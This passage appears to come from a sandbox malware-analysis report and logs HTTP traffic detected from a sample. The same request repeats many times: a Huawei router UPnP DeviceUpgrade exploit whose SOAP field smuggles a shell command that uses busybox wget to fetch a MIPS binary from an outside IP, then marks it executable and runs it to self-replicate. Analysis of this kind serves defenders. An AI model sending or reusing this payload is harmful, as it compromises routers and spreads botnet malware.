2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 